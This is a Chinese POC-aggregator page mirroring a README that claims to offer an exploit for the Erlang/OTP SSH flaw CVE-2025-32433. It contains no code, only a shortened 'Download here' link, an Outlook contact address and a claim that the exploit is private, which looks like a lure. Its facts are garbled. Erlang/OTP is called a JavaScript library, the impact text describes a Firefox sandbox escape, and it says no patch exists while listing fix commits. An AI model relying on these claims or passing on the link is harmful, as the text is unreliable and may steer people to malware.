POC详情: 228e3794c0521709169de16786e17a3ae3534990

来源
关联漏洞
标题: Erlang/OTP 访问控制错误漏洞 (CVE-2025-32433)
描述:Erlang/OTP是Erlang/OTP开源的一个JavaScript编写的处理处理异常的库。该库可以捕捉node.js内置API引发的异常。 Erlang/OTP 27.3.3之前版本存在访问控制错误漏洞,该漏洞源于SSH协议消息处理缺陷,可能导致远程代码执行。
描述
Missing Authentication for Critical Function (CWE-306)-Exploit
介绍
# CVE-2025-32433
A critical vulnerability in Erlang/OTP SSH server allows unauthenticated remote code execution (RCE). The flaw exists in the SSH protocol message handling mechanism, enabling attackers to execute arbitrary commands without requiring authentication credentials.
## Impact
Critical severity vulnerability that enables attackers to potentially: - Escape the browser's sandbox protection - Execute arbitrary code - Compromise system integrity - Gain unauthorized access to system resources This vulnerability specifically targets Firefox on Windows and was being actively exploited in the wild. If  SSH daemon is running as root, the attacker has full access to that device


## Exploit:
## [Download here](https://tinyurl.com/2snpnjcp)
## Details
+ **CVE ID**: CVE-2025-32433

+ **Published**: 04/16/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 10
+ **Patch Available:  (No official patch yet)**


## Affected Versions
Erlang/OTP SSH

## Contact
+ **For inquiries, please contact:hovovi8373@outlook.com**

## Hyperlinks Resource
+ http://www.openwall.com/lists/oss-security/2025/04/16/2	
+ http://www.openwall.com/lists/oss-security/2025/04/18/1	
+ https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12	
+ https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f	
+ https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891	
+ https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2
文件快照

[4.0K] /data/pocs/228e3794c0521709169de16786e17a3ae3534990 └── [1.5K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。